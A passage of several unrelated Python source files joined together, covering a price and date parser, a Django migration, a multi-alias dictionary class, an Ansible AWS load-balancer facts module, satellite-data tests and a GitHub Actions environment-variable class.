>>> dollar_amount('sold 1,900.99 comics')
(1900.99, 'sold comics')
>>> dollar_amount('bought $12,345,900.99 comics')
(12345900.99, 'bought comics')
>>> dollar_amount('hi there kitty kat')
(None, 'hi there kitty kat')
>>> dollar_amount('19.12345000001')
(19.12, '')
>>> dollar_amount('19.129')
(19.12, '')
"""
s = _prepstr(s)
amt = None
matched_amt = ''
# First, split up the string and hunt for price-like things
bits = s.split(' ')
for chunk in bits:
if chunk[0] == '$' and len(chunk) > 1:
# Then we probably have it
str_amt = extract.price_like(chunk)
try:
amt = float(str_amt)
except (TypeError, ValueError):
pass
else:
if amt:
matched_amt = chunk
break
if not amt:
# Keep looking
for chunk in bits:
str_amt = extract.price_like(chunk)
try:
amt = float(str_amt)
except (TypeError, ValueError):
pass
else:
if amt:
matched_amt = chunk
break
# If we found something, remove it from the string
if amt and matched_amt:
s = s.replace(matched_amt, '', 1)
s = _prepstr(s.replace('$', ''))
return amt, s
def calendar_date(s):
"""
>>> calendar_date('4/20/14')
(datetime.date(2014, 4, 20), '')
>>> calendar_date('4/20/2014')
(datetime.date(2014, 4, 20), '')
>>> calendar_date('4-20-14')
(datetime.date(2014, 4, 20), '')
>>> calendar_date('4-20-2014')
(datetime.date(2014, 4, 20), '')
>>> result = calendar_date('coffee on 4/20')
>>> result == (date(date.today().year, 4, 20), 'coffee on')
True
>>> result = calendar_date('3.53 for coffee on 4/20')
>>> result == (date(date.today().year, 4, 20), '3.53 for coffee on')
True
>>> result = calendar_date('3.53 for coffee on 4.20')
>>> result == (date(date.today().year, 4, 20), '3.53 for coffee on')
True
>>> today = date.today()
>>> res = calendar_date('today')
>>> res == (today, '')
True
>>> res = calendar_date('tomorrow')
>>> res == (today + timedelta(days=1), '')
True
>>> res = calendar_date('coffee tomorrow')
>>> res == (today + timedelta(days=1), 'coffee')
True
>>> calendar_date('foobar')
(None, 'foobar')
"""
def _sub_dayofweek(dow, num, s):
d = today - timedelta(days=today.isoweekday() - num)
if d > today:
d = d - timedelta(days=7)
s = s.replace(dow, '', 1)
return d, s
s = _prepstr(s)
#
# Find the date. Default to 'today' if not resolved
today = date.today()
d = None
if s.find('today') >= 0:
d = today
s = s.replace('today', '', 1)
elif s.find('tomorrow') >= 0:
d = today + timedelta(days=1)
s = s.replace('tomorrow', '', 1)
elif s.find('yesterday') >= 0:
d = today - timedelta(days=1)
s = s.replace('yesterday', '', 1)
elif s.find('monday') >= 0:
d, s = _sub_dayofweek('monday', 1, s)
elif s.find('tuesday') >= 0:
d, s = _sub_dayofweek('tuesday', 2, s)
elif s.find('wednesday') >= 0:
d, s = _sub_dayofweek('wednesday', 3, s)
elif s.find('thursday') >= 0:
d, s = _sub_dayofweek('thursday', 4, s)
elif s.find('friday') >= 0:
d, s = _sub_dayofweek('friday', 5, s)
elif s.find('saturday') >= 0:
d, s = _sub_dayofweek('saturday', 6, s)
elif s.find('sunday') >= 0:
d, s = _sub_dayofweek('sunday', 7, s)
else:
# Split up the patterns so we don't have to test ALL of them if some don't seem likely to match
slash_patterns = ["%m/%d", "%m/%d/%y", "%m/%d/%Y", "%Y/%m/%d"]
dash_patterns = ["%m-%d-%y", "%m-%d-%Y", "%Y-%m-%d"]
dot_patterns = ["%m.%d"]
use_patterns = []
if s.find('/') >= 0:
use_patterns.extend(slash_patterns)
if s.find('-') >= 0:
use_patterns.extend(dash_patterns)
if s.find('.') >= 0:
use_patterns.extend(dot_patterns)
# Tokenize and scan for date-like strings
for pat in use_patterns:
# If the next bit finds something, `d` will be a datetime object, and
# `matched_str` will be the string that the code thinks is the date.
# Everything else will be removed. (Unless a date isn't found at all
# in the string, in which case `d` will be None and `matched_str` will
# be whatever we passed-in.
d, matched_str = extract.date_by_pattern(s, pattern=pat, return_match_str=True)
if d is not None:
# If we found a date, remove that part of the string from the source string,
# but only once.
s = s.replace(matched_str, '', 1)
break
s = _prepstr(s)
return d, s
# --
if __name__ == "__main__":
import sys
import getopt
try:
opts, args = getopt.getopt(sys.argv[1:], '', ['test', 'unittest', 'doctest'])
except getopt.GetoptError as err:
print(str(err))
sys.exit(2)
run_doc_tests = False
run_unit_tests = False
run_all_tests = False
for o, a in opts:
if o in ["--test"]:
run_all_tests = True
if o in ["--doctest"]:
run_doc_tests = True
if o in ["--unittest"]:
run_unit_tests = True
def _run_doctests():
import doctest
print("[find.py] Running doctest...")
doctest.testmod()
print("Done.")
if run_all_tests:
_run_doctests()
elif run_doc_tests:
_run_doctests()
sys.exit(2)
|
# Generated by Django 2.0.1 on 2018-03-06 23:18
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('classy', '0027_auto_20180306_1517'),
]
operations = [
migrations.AddField(
model_name='classification_review',
name='group_id',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='classy.classification_review_groups'),
),
]
|
import yaml
def get_data_from_yaml(file_path):
with open(file_path) as f:
dict = yaml.load(f, Loader=yaml.FullLoader)
return dict
|
r = float(input("Quanto de dinheiro você tem na carteira? R$"))
d = r/3.27
print("Com R${:.2f} você pode comprar US${:.2f}".format(r, d)) |
"""
Copyright 2019 Samsung SDS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import numpy as np
import pandas as pd
from brightics.common.utils import check_required_parameters
from brightics.common.utils import get_default_from_parameters_if_required
from brightics.common.validation import validate
from brightics.common.validation import greater_than
from brightics.common.validation import greater_than_or_equal_to
from brightics.common.classify_input_type import check_col_type
def replace_string(table, **params):
check_required_parameters(_replace_string, params, ['table'])
return _replace_string(table, **params)
def _replace_string(table, input_cols, replace_mode='part', empty_as_null=False, target_string_null=True, target_string=None, replace_string_null=True, replace_string=None):
out_table = table.copy()
for input_col in input_cols:
if replace_mode == 'part':
if target_string and replace_string:
out_table[input_col] = [(x.replace(target_string, replace_string) if not pd.isnull(x) else x) for x in table[input_col]]
else:
if target_string_null and not replace_string_null:
out_table[input_col] = np.where(pd.isnull(table[input_col]), replace_string, table[input_col])
if empty_as_null:
out_table[input_col] = np.where(out_table[input_col] == '', replace_string, out_table[input_col])
elif not target_string_null and replace_string_null:
out_table[input_col] = np.where(table[input_col] == target_string, None, table[input_col])
elif not target_string_null and not replace_string_null:
out_table[input_col] = np.where(table[input_col] == target_string, replace_string, table[input_col])
return {'out_table' : out_table} |
from collections.abc import MutableMapping
from typing import List, Hashable
from mmdict.errors import AliasExistsError
class MultiDict(MutableMapping):
def __init__(self, initial={}, aliases={}):
# Actual storage of values, by cannonical key
self.value_store = {}
# Mapping of alias -> cannonical key
self.alias_to_storage = {}
# Mapping of {cannonical key -> Set[alias: Hashable]}
self.storage_to_aliases = {}
# Load any constructor supplied aliases to prepare for
# any constructor-supplied data
for real, alias in aliases.items():
if not isinstance(alias, List):
alias = [alias]
self.alias(real, alias)
# Load any constructor-supplied data. We simply let the
# `MutableMapping` protocol take the wheel from here
self.update(initial)
def alias(self, canonical: Hashable, aliases: List[Hashable]):
# We do not want to allow an alias to shadow a destination
if self.is_alias(canonical):
raise AliasExistsError(f'Destination {canonical} is already defined as an alias.')
# Ensure that any potential subclass transforms take place
canonical = self._to_storage_key(canonical)
not_found = KeyError("Not Found")
for alias in aliases:
alias_key = self._to_internal_alias(alias)
# Don't bother aliasing identity
if canonical == alias_key:
continue
# We are not alowed to overwrite an alias with an alias to a different key.
#
# This prevents an initialization such as as
# `MultiDict(..., aliases={"one": ["One", 1], "two": ["One", "Two"]})`
# from silently replacing, or abitrarily chosing to keep, one definition of
# `"One" -> "one"` or `"One" -> "two"`
#
# We use a sentinel `not_found` to avoid failing on falsey but valid keys.
existing = self.alias_to_storage.get(alias_key, not_found)
if existing not in (canonical, not_found):
existing_external = self._to_external_key(existing)
raise AliasExistsError(f'{alias} is already defined as an alias for {existing_external}')
# Store forward and backward refferences for the alias
self.alias_to_storage[alias_key] = canonical
aliases_for_cannonical = self.storage_to_aliases.setdefault(canonical, set())
aliases_for_cannonical.add(alias_key)
def unalias(self, alias: Hashable) -> bool:
'''
Remove an alias to a canonical key.
Returns `True` if the alias was removed `False` if no action was taken.
'''
not_found = KeyError("not found")
alias_key = self._to_internal_alias(alias)
storage_key = self.alias_to_storage.get(alias_key, not_found)
if storage_key == not_found:
return False
del self.alias_to_storage[alias_key]
self.storage_to_aliases[storage_key].remove(alias_key)
return True
def unalias_all(self, key: Hashable):
'''
Remove any aliases associated with `key`, first by following
the aliases to the cannoncal key, then clearing all aliases for
that cannonical key.
'''
storage_key = self._to_storage_key(key)
aliases = self.storage_to_aliases.get(storage_key, set())
for alias in aliases.copy():
self.unalias(alias)
def is_alias(self, key: Hashable) -> bool:
return self._to_internal_alias(key) in self.alias_to_storage
def _to_internal_alias(self, key):
'''
Transforms a supplied alias to an internal alias.
Not used in the base, but allows for easier normalization
of aliases.
'''
return key
def _to_storage_key(self, key):
'''
Transform a supplied key into the key used to store values in
`self.value_store` by resolving aliases.
'''
internal_alias = self._to_internal_alias(key)
return self.alias_to_storage.get(internal_alias, key)
def _to_external_key(self, key):
'''
Transforms a `self.value_store` key into an externally presentable key.
Not actively used here, but tied into `__iter__`, so that subclasses can
differentiate between the storage key and the user supplied key that
produced it.
For example, using downcased storage keys, but preserving case for iteration.
'''
return key
# MutableMapping protocol definitions
def __getitem__(self, key):
value_store_key = self._to_storage_key(key)
try:
return self.value_store[value_store_key]
except KeyError:
# Re-raise the `KeyError` with the passed in key instead
# of the transformed, canonical storage one.
raise KeyError(key)
def __setitem__(self, key, value):
value_store_key = self._to_storage_key(key)
self.value_store[value_store_key] = value
def __delitem__(self, key):
value_store_key = self._to_storage_key(key)
del self.value_store[value_store_key]
def __iter__(self):
return (self._to_external_key(k) for k in self.value_store.keys())
def __len__(self):
return len(self.value_store)
# Pretty-printers and exports
def to_dict(self) -> dict:
'''
Return a regular `dict` of the canonical keys and values
'''
return dict(self.items())
def __repr__(self):
class_name = self.__class__.__name__
data = self.to_dict()
aliases = self.storage_to_aliases
return f'<{class_name}: {data} aliases={aliases}>'
|
#!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: elb_application_lb_facts
short_description: Gather facts about application ELBs in AWS
description:
- Gather facts about application ELBs in AWS
version_added: "2.4"
author: Rob White (@wimnat)
options:
load_balancer_arns:
description:
- The Amazon Resource Names (ARN) of the load balancers. You can specify up to 20 load balancers in a single call.
required: false
names:
description:
- The names of the load balancers.
required: false
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
# Gather facts about all target groups
- elb_application_lb_facts:
# Gather facts about the target group attached to a particular ELB
- elb_application_lb_facts:
load_balancer_arns:
- "arn:aws:elasticloadbalancing:ap-southeast-2:001122334455:loadbalancer/app/my-elb/aabbccddeeff"
# Gather facts about a target groups named 'tg1' and 'tg2'
- elb_application_lb_facts:
names:
- elb1
- elb2
'''
RETURN = '''
load_balancers:
description: a list of load balancers
returned: always
type: complex
contains:
access_logs_s3_bucket:
description: The name of the S3 bucket for the access logs.
returned: when status is present
type: string
sample: mys3bucket
access_logs_s3_enabled:
description: Indicates whether access logs stored in Amazon S3 are enabled.
returned: when status is present
type: string
sample: true
access_logs_s3_prefix:
description: The prefix for the location in the S3 bucket.
returned: when status is present
type: string
sample: /my/logs
availability_zones:
description: The Availability Zones for the load balancer.
returned: when status is present
type: list
sample: "[{'subnet_id': 'subnet-aabbccddff', 'zone_name': 'ap-southeast-2a'}]"
canonical_hosted_zone_id:
description: The ID of the Amazon Route 53 hosted zone associated with the load balancer.
returned: when status is present
type: string
sample: ABCDEF12345678
created_time:
description: The date and time the load balancer was created.
returned: when status is present
type: string
sample: "2015-02-12T02:14:02+00:00"
deletion_protection_enabled:
description: Indicates whether deletion protection is enabled.
returned: when status is present
type: string
sample: true
dns_name:
description: The public DNS name of the load balancer.
returned: when status is present
type: string
sample: internal-my-elb-123456789.ap-southeast-2.elb.amazonaws.com
idle_timeout_timeout_seconds:
description: The idle timeout value, in seconds.
returned: when status is present
type: string
sample: 60
ip_address_type:
description: The type of IP addresses used by the subnets for the load balancer.
returned: when status is present
type: string
sample: ipv4
load_balancer_arn:
description: The Amazon Resource Name (ARN) of the load balancer.
returned: when status is present
type: string
sample: arn:aws:elasticloadbalancing:ap-southeast-2:0123456789:loadbalancer/app/my-elb/001122334455
load_balancer_name:
description: The name of the load balancer.
returned: when status is present
type: string
sample: my-elb
scheme:
description: Internet-facing or internal load balancer.
returned: when status is present
type: string
sample: internal
security_groups:
description: The IDs of the security groups for the load balancer.
returned: when status is present
type: list
sample: ['sg-0011223344']
state:
description: The state of the load balancer.
returned: when status is present
type: dict
sample: "{'code': 'active'}"
tags:
description: The tags attached to the load balancer.
returned: when status is present
type: dict
sample: "{
'Tag': 'Example'
}"
type:
description: The type of load balancer.
returned: when status is present
type: string
sample: application
vpc_id:
description: The ID of the VPC for the load balancer.
returned: when status is present
type: string
sample: vpc-0011223344
'''
import traceback
try:
import boto3
from botocore.exceptions import ClientError, NoCredentialsError
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import (boto3_conn, boto3_tag_list_to_ansible_dict, camel_dict_to_snake_dict,
ec2_argument_spec, get_aws_connection_info)
def get_elb_listeners(connection, module, elb_arn):
try:
return connection.describe_listeners(LoadBalancerArn=elb_arn)['Listeners']
except ClientError as e:
module.fail_json(msg=e.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(e.response))
def get_listener_rules(connection, module, listener_arn):
try:
return connection.describe_rules(ListenerArn=listener_arn)['Rules']
except ClientError as e:
module.fail_json(msg=e.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(e.response))
def get_load_balancer_attributes(connection, module, load_balancer_arn):
try:
load_balancer_attributes = boto3_tag_list_to_ansible_dict(connection.describe_load_balancer_attributes(LoadBalancerArn=load_balancer_arn)['Attributes'])
except ClientError as e:
module.fail_json(msg=e.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(e.response))
# Replace '.' with '_' in attribute key names to make it more Ansibley
for k, v in list(load_balancer_attributes.items()):
load_balancer_attributes[k.replace('.', '_')] = v
del load_balancer_attributes[k]
return load_balancer_attributes
def get_load_balancer_tags(connection, module, load_balancer_arn):
try:
return boto3_tag_list_to_ansible_dict(connection.describe_tags(ResourceArns=[load_balancer_arn])['TagDescriptions'][0]['Tags'])
except ClientError as e:
module.fail_json(msg=e.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(e.response))
def list_load_balancers(connection, module):
load_balancer_arns = module.params.get("load_balancer_arns")
names = module.params.get("names")
try:
load_balancer_paginator = connection.get_paginator('describe_load_balancers')
if not load_balancer_arns and not names:
load_balancers = load_balancer_paginator.paginate().build_full_result()
if load_balancer_arns:
load_balancers = load_balancer_paginator.paginate(LoadBalancerArns=load_balancer_arns).build_full_result()
if names:
load_balancers = load_balancer_paginator.paginate(Names=names).build_full_result()
except ClientError as e:
if e.response['Error']['Code'] == 'LoadBalancerNotFound':
module.exit_json(load_balancers=[])
else:
module.fail_json(msg=e.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(e.response))
except NoCredentialsError as e:
module.fail_json(msg="AWS authentication problem. " + e.message, exception=traceback.format_exc())
for load_balancer in load_balancers['LoadBalancers']:
# Get the attributes for each elb
load_balancer.update(get_load_balancer_attributes(connection, module, load_balancer['LoadBalancerArn']))
# Get the listeners for each elb
load_balancer['listeners'] = get_elb_listeners(connection, module, load_balancer['LoadBalancerArn'])
# For each listener, get listener rules
for listener in load_balancer['listeners']:
listener['rules'] = get_listener_rules(connection, module, listener['ListenerArn'])
# Turn the boto3 result in to ansible_friendly_snaked_names
snaked_load_balancers = [camel_dict_to_snake_dict(load_balancer) for load_balancer in load_balancers['LoadBalancers']]
# Get tags for each load balancer
for snaked_load_balancer in snaked_load_balancers:
snaked_load_balancer['tags'] = get_load_balancer_tags(connection, module, snaked_load_balancer['load_balancer_arn'])
module.exit_json(load_balancers=snaked_load_balancers)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
load_balancer_arns=dict(type='list'),
names=dict(type='list')
)
)
module = AnsibleModule(argument_spec=argument_spec,
mutually_exclusive=['load_balancer_arns', 'names'],
supports_check_mode=True
)
if not HAS_BOTO3:
module.fail_json(msg='boto3 required for this module')
region, ec2_url, aws_connect_params = get_aws_connection_info(module, boto3=True)
if region:
connection = boto3_conn(module, conn_type='client', resource='elbv2', region=region, endpoint=ec2_url, **aws_connect_params)
else:
module.fail_json(msg="region must be specified")
list_load_balancers(connection, module)
if __name__ == '__main__':
main()
|
## Brian Blaylock
## October 18, 2021
"""
Some simple tests for the ABI data
"""
from goes2go.data import goes_nearesttime, goes_latest, goes_timerange
def test_nearesttime():
ds = goes_nearesttime('2020-01-01', save_dir='$TMPDIR')
def test_latest():
ds = goes_latest(save_dir='$TMPDIR')
|
#!/usr/bin/env python3
# coding=utf-8
"""
Mreleaser __init__.py Module
"""
from __future__ import annotations
__all__ = (
"AnyPath",
"ExcType",
"TemporaryFileType",
"CmdError",
"Env",
"Git",
"Path",
"Releaser",
"TempDir",
"aiocmd",
"cli_invoke",
"cmd",
"suppress",
"version",
)
import asyncio
import contextlib
import ipaddress
import importlib.metadata
import os
import pathlib
import subprocess
import tempfile
import urllib.parse
from dataclasses import dataclass
from dataclasses import field
from dataclasses import InitVar
from ipaddress import IPv4Address
from ipaddress import IPv6Address
from os import PathLike
from subprocess import CompletedProcess
from typing import Any
from typing import AnyStr
from typing import Callable
from typing import ClassVar
from typing import IO
from typing import Literal
from typing import Optional
from typing import ParamSpec
from typing import Type
from typing import TypeAlias
from typing import TypeVar
from typing import Union
from urllib.parse import ParseResult
import git
from git import Git as GitCmd
from git import GitCmdObjectDB
from gitdb import LooseObjectDB
from ppath import Path
from setuptools.config import read_configuration
from typer import Argument
from typer import Typer
from typer.testing import CliRunner
P = ParamSpec('P')
T = TypeVar('T')
GitType: TypeAlias = 'Git'
PathType: TypeAlias = 'Path'
__project__: str = pathlib.Path(__file__).parent.name
app = Typer(add_completion=False, context_settings=dict(help_option_names=['-h', '--help']), name=__project__)
AnyPath: TypeAlias = Union[PathType, PathLike, AnyStr, IO[AnyStr]]
ExcType: TypeAlias = Type[Exception] | tuple[Type[Exception], ...]
class TemporaryFileType(type(tempfile.NamedTemporaryFile())): file: PathType = None
class CmdError(subprocess.CalledProcessError):
"""
Raised when run() and the process returns a non-zero exit status.
Attributes:
process: The CompletedProcess object returned by run().
"""
def __init__(self, process: CompletedProcess = None):
super().__init__(process.returncode, process.args, output=process.stdout, stderr=process.stderr)
def __str__(self):
value = super().__str__()
if self.stderr is not None:
value += "\n" + self.stderr
if self.stdout is not None:
value += "\n" + self.stdout
return value
@dataclass
class Env:
# noinspection LongLine
"""
GitHub Actions Variables Class
See Also: `Environment variables
<https://docs.github.com/en/enterprise-cloud@latest/actions/learn-github-actions/environment-variables>`_
If you need to use a workflow run's URL from within a job, you can combine these environment variables:
``$GITHUB_SERVER_URL/$GITHUB_REPOSITORY/actions/runs/$GITHUB_RUN_ID``
If you generate a value in one step of a job, you can use the value in subsequent ``steps`` of
the same job by assigning the value to an existing or new environment variable and then writing
this to the ``GITHUB_ENV`` environment file, see `Commands
<https://docs.github.com/en/enterprise-cloud@latest/actions/reference/workflow-commands-for-github-actions/#setting-an-environment-variable>`_.
If you want to pass a value from a step in one job in a ``workflow`` to a step in another job in the workflow,
you can define the value as a job output, see `Syntax
<https://docs.github.com/en/enterprise-cloud@latest/actions/learn-github-actions/workflow-syntax-for-github-actions#jobsjob_idoutputs>`_.
"""
CI: bool | str | None = field(default=None, init=False)
"""Always set to ``true`` in a GitHub Actions environment."""
GITHUB_ACTION: str | None = field(default=None, init=False)
# noinspection LongLine
"""
The name of the action currently running, or the `id
<https://docs.github.com/en/enterprise-cloud@latest/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idstepsid>`_ of a step.
For example, for an action, ``__repo-owner_name-of-action-repo``.
GitHub removes special characters, and uses the name ``__run`` when the current step runs a script without an id.
If you use the same script or action more than once in the same job,
the name will include a suffix that consists of the sequence number preceded by an underscore.
For example, the first script you run will have the name ``__run``, and the second script will be named ``__run_2``.
Similarly, the second invocation of ``actions/checkout`` will be ``actionscheckout2``.
"""
GITHUB_ACTION_PATH: Path | str | None = field(default=None, init=False)
"""
The path where an action is located. This property is only supported in composite actions.
You can use this path to access files located in the same repository as the action.
For example, ``/home/runner/work/_actions/repo-owner/name-of-action-repo/v1``.
"""
GITHUB_ACTION_REPOSITORY: str | None = field(default=None, init=False)
"""
For a step executing an action, this is the owner and repository name of the action.
For example, ``actions/checkout``.
"""
GITHUB_ACTIONS: bool | str | None = field(default=None, init=False)
"""
Always set to ``true`` when GitHub Actions is running the workflow.
You can use this variable to differentiate when tests are being run locally or by GitHub Actions.
"""
GITHUB_ACTOR: str | None = field(default=None, init=False)
"""
The name of the person or app that initiated the workflow.
For example, ``octocat``.
"""
GITHUB_API_URL: ParseResult | str | None = field(default=None, init=False)
"""
API URL.
For example: ``https://api.github.com``.
"""
GITHUB_BASE_REF: str | None = field(default=None, init=False)
"""
The name of the base ref or target branch of the pull request in a workflow run.
This is only set when the event that triggers a workflow run is either ``pull_request`` or ``pull_request_target``.
For example, ``main``.
"""
GITHUB_ENV: Path | str | None = field(default=None, init=False)
# noinspection LongLine
"""
The path on the runner to the file that sets environment variables from workflow commands.
This file is unique to the current step and changes for each step in a job.
For example, ``/home/runner/work/_temp/_runner_file_commands/set_env_87406d6e-4979-4d42-98e1-3dab1f48b13a``.
For more information, see `Workflow commands for GitHub Actions.
<https://docs.github.com/en/enterprise-cloud@latest/actions/using-workflows/workflow-commands-for-github-actions#setting-an-environment-variable>`_
"""
GITHUB_EVENT_NAME: str | None = field(default=None, init=False)
"""
The name of the event that triggered the workflow.
For example, ``workflow_dispatch``.
"""
GITHUB_EVENT_PATH: Path | str | None = field(default=None, init=False)
"""
The path to the file on the runner that contains the full event webhook payload.
For example, ``/github/workflow/event.json``.
"""
GITHUB_GRAPHQL_URL: ParseResult | str | None = field(default=None, init=False)
"""
Returns the GraphQL API URL.
For example: ``https://api.github.com/graphql``.
"""
GITHUB_HEAD_REF: str | None = field(default=None, init=False)
"""
The head ref or source branch of the pull request in a workflow run.
This property is only set when the event that triggers a workflow run is either
``pull_request`` or ``pull_request_target``.
For example, ``feature-branch-1``.
"""
GITHUB_JOB: str | None = field(default=None, init=False)
# noinspection LongLine
"""
The `job_id
<https://docs.github.com/en/enterprise-cloud@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_id>`_
of the current job.
For example, ``greeting_job``.
"""
GITHUB_PATH: Path | str | None = field(default=None, init=False)
# noinspection LongLine
"""
The path on the runner to the file that sets system PATH variables from workflow commands.
This file is unique to the current step and changes for each step in a job.
For example, ``/home/runner/work/_temp/_runner_file_commands/add_path_899b9445-ad4a-400c-aa89-249f18632cf5``.
For more information, see
`Workflow commands for GitHub Actions.
<https://docs.github.com/en/enterprise-cloud@latest/actions/using-workflows/workflow-commands-for-github-actions#adding-a-system-path>`_
"""
GITHUB_REF: str | None = field(default=None, init=False)
"""
The branch or tag ref that triggered the workflow run.
For branches this is the format ``refs/heads/<branch_name>``,
for tags it is ``refs/tags/<tag_name>``,
and for pull requests it is ``refs/pull/<pr_number>/merge``.
This variable is only set if a branch or tag is available for the event type.
For example, ``refs/heads/feature-branch-1``.
"""
GITHUB_REF_NAME: str | None = field(default=None, init=False)
"""
The branch or tag name that triggered the workflow run.
For example, ``feature-branch-1``.
"""
GITHUB_REF_PROTECTED: bool | str | None = field(default=None, init=False)
"""
``true`` if branch protections are configured for the ref that triggered the workflow run.
"""
GITHUB_REF_TYPE: str | None = field(default=None, init=False)
"""
The type of ref that triggered the workflow run.
Valid values are ``branch`` or ``tag``.
For example, ``branch``.
"""
GITHUB_REPOSITORY: str | None = field(default=None, init=False)
"""
The owner and repository name.
For example, ``octocat/Hello-World``.
"""
GITHUB_REPOSITORY_OWNER: str | None = field(default=None, init=False)
"""
The repository owner's name.
For example, ``octocat``.
"""
GITHUB_RETENTION_DAYS: str | None = field(default=None, init=False)
"""
The number of days that workflow run logs and artifacts are kept.
For example, ``90``.
"""
GITHUB_RUN_ATTEMPT: str | None = field(default=None, init=False)
"""
A unique number for each attempt of a particular workflow run in a repository.
This number begins at ``1`` for the workflow run's first attempt, and increments with each re-run.
For example, ``3``.
"""
GITHUB_RUN_ID: str | None = field(default=None, init=False)
"""
A unique number for each workflow run within a repository.
This number does not change if you re-run the workflow run.
For example, ``1658821493``.
"""
GITHUB_RUN_NUMBER: str | None = field(default=None, init=False)
"""
A unique number for each run of a particular workflow in a repository.
This number begins at ``1`` for the workflow's first run, and increments with each new run.
This number does not change if you re-run the workflow run.
For example, ``3``.
"""
GITHUB_SERVER_URL: ParseResult | str | None = field(default=None, init=False)
"""
The URL of the GitHub Enterprise Cloud server.
For example: ``https://github.com``.
"""
GITHUB_SHA: str | None = field(default=None, init=False)
"""
The commit SHA that triggered the workflow.
The value of this commit SHA depends on the event that triggered the workflow.
For more information, see `Events that trigger workflows.
<https://docs.github.com/en/enterprise-cloud@latest/actions/using-workflows/events-that-trigger-workflows>`_
For example, ``ffac537e6cbbf934b08745a378932722df287a53``.
"""
GITHUB_WORKFLOW: Path | str | None = field(default=None, init=False)
"""
The name of the workflow.
For example, ``My test workflow``.
If the workflow file doesn't specify a name,
the value of this variable is the full path of the workflow file in the repository.
"""
GITHUB_WORKSPACE: Path | str | None = field(default=None, init=False)
"""
The default working directory on the runner for steps, and the default location of your repository
when using the `checkout <https://github.com/actions/checkout>`_ action.
For example, ``/home/runner/work/my-repo-name/my-repo-name``.
"""
RUNNER_ARCH: str | None = field(default=None, init=False)
"""
The architecture of the runner executing the job.
Possible values are ``X86``, ``X64``, ``ARM``, or ``ARM64``.
For example, ``X86``.
"""
RUNNER_NAME: str | None = field(default=None, init=False)
"""
The name of the runner executing the job.
For example, ``Hosted Agent``.
"""
RUNNER_OS: str | None = field(default=None, init=False)
"""
The operating system of the runner executing the job.
Possible values are ``Linux``, ``Windows``, or ``macOS``.
For example, ``Linux``.
"""
RUNNER_TEMP: Path | str | None = field(default=None, init=False)
"""
The path to a temporary directory on the runner.
This directory is emptied at the beginning and end of each job.
Note that files will not be removed if the runner's user account does not have permission to delete them.
For example, ``_temp``.
"""
RUNNER_TOOL_CACHE: str | None = field(default=None, init=False)
# noinspection LongLine
"""
The path to the directory containing preinstalled tools for GitHub-hosted runners.
For more information, see `About GitHub-hosted runners.
<https://docs.github.com/en/enterprise-cloud@latest/actions/reference/specifications-for-github-hosted-runners/#supported-software>`_
`Ubuntu latest <https://github.com/actions/virtual-environments/blob/main/images/linux/Ubuntu2004-Readme.md>`_
`macOS latest <https://github.com/actions/virtual-environments/blob/main/images/macos/macos-11-Readme.md>`_
For example, ``C:\hostedtoolcache\windows``.
"""
SUDO_USER: str | None = field(default=None, init=False)
HOME: str | None = field(default=None, init=False)
LC_TYPE: str | None = field(default=None, init=False)
PYTHONUNBUFFERED: str | None = field(default=None, init=False)
XPC_FLAGS: str | None = field(default=None, init=False)
SSH_AUTH_SOCK: str | None = field(default=None, init=False)
TMPDIR: str | None = field(default=None, init=False)
IPYTHONENABLE: str | None = field(default=None, init=False)
OLDPWD: str | None = field(default=None, init=False)
PYTHONIOENCODING: str | None = field(default=None, init=False)
SHELL: str | None = field(default=None, init=False)
PYTHONPATH: str | None = field(default=None, init=False)
PYCHARM_MATPLOTLIB_INTERACTIVE: str | None = field(default=None, init=False)
__CFBundleIdentifier: str | None = field(default=None, init=False)
__CF_USER_TEXT_ENCODING: str | None = field(default=None, init=False)
PYCHARM_DISPLAY_PORT: str | None = field(default=None, init=False)
PYCHARM_HOSTED: str | None = field(default=None, init=False)
PWD: str | None = field(default=None, init=False)
XPC_SERVICE_NAME: str | None = field(default=None, init=False)
PYCHARM_MATPLOTLIB_INDEX: str | None = field(default=None, init=False)
LOGNAME: str | None = field(default=None, init=False)
PYDEVD_LOAD_VALUES_ASYNC: str | None = field(default=None, init=False)
PYCHARM_PROPERTIES: str | None = field(default=None, init=False)
PS1: str | None = field(default=None, init=False)
COMMAND_MODE: str | None = field(default=None, init=False)
PYCHARM_VM_OPTIONS: str | None = field(default=None, init=False)
PATH: str | None = field(default=None, init=False)
_parse_as_int: ClassVar[tuple[str, ...]] = ("GITHUB_RUN_ATTEMPT", "GITHUB_RUN_ID", "GITHUB_RUN_NUMBER",)
_parse_as_int_suffix: ClassVar[tuple[str, ...]] = ("_GID", "_JOBS", "_PORT", "_UID",)
parsed: InitVar[bool] = True
def __post_init__(self, parsed: bool) -> None:
"""
Instance of Env class
Args:
parsed: Parse the environment variables using :func:`mreleaser.parse_str`,
except :func:`Env.as_int` (default: True)
"""
self.__dict__.update({k: self.as_int(k, v) for k, v in os.environ.items()} if parsed else os.environ)
def __contains__(self, item):
return item in self.__dict__
def __getattr__(self, name: str) -> str | None:
if name in self:
return self.__dict__[name]
return None
def __getattribute__(self, name: str) -> str | None:
if hasattr(self, name):
return super().__getattribute__(name)
return None
def __getitem__(self, item: str) -> str | None:
